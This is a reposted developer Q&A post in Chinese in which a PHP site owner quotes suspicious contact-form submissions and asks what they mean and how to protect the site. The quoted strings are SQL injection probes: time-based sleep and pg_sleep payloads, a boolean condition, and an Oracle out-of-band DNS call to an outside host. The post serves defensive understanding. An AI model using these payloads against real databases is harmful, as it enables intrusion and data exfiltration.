gpt4 book ai didi

php - PHP 中的无效代码或消息

转载 作者:行者123 更新时间:2023-12-05 07:35:42 25 4
gpt4 key购买 nike

<分区>

我是 PHP 开发的新手。我使用 PHP、HTML 和 Css 创建了一个网站,其中有一个联系我们的页面。自从最近几天来自特定国家(我不想提及国家名称)的人正在创建支持消息并输入一些不寻常或可疑的消息。

来自的联系人有四个字段,例如全名、电子邮件、主题和消息。有人正在发送这样的消息

1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='

3rd:
1iY5zL4R'));select pg_sleep(3); --

4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')

而且还有很多,请熟悉PHP的或者其他人告诉我这是怎么回事。也请分享一些我应该采取的安全预防措施,以防止任何威胁或黑客攻击。

我使用 MYSQLi 构建了我的站点,以防止/最小化 SQL 注入(inject)威胁。

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com